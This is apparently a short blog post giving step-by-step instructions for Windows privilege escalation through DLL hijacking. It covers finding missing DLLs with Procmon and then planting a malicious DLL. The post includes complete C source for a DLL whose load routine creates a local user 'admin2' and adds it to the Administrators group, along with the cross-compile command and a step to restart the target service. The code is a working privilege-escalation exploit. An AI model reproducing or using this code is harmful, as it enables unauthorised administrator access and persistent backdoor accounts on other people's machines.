- Download a program which runs with higher privilegs in an own VM.
- Use Procmon to find DLLs which it tries to load, but didn’t find. Download it from Microsoft.
- Filter for the service or executeable. Restart it afterwards.
- See through the list and see if there are DLL loading which are not there or which could be overwritten.
- Maybe filter also for
Operation = CreateFile.
- Maybe filter also for
- If you found a Place to create / overwrite an DLL: Create a DLL. Using this template from Microsoft, a variant could be:
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user admin2 password123! /add");
i = system ("net localgroup administrators admin2 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
Compile it natively or not:
x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll
Restart the service / application somehow and check if there is a new admin2 alive.
Leave a Reply
You must be logged in to post a comment.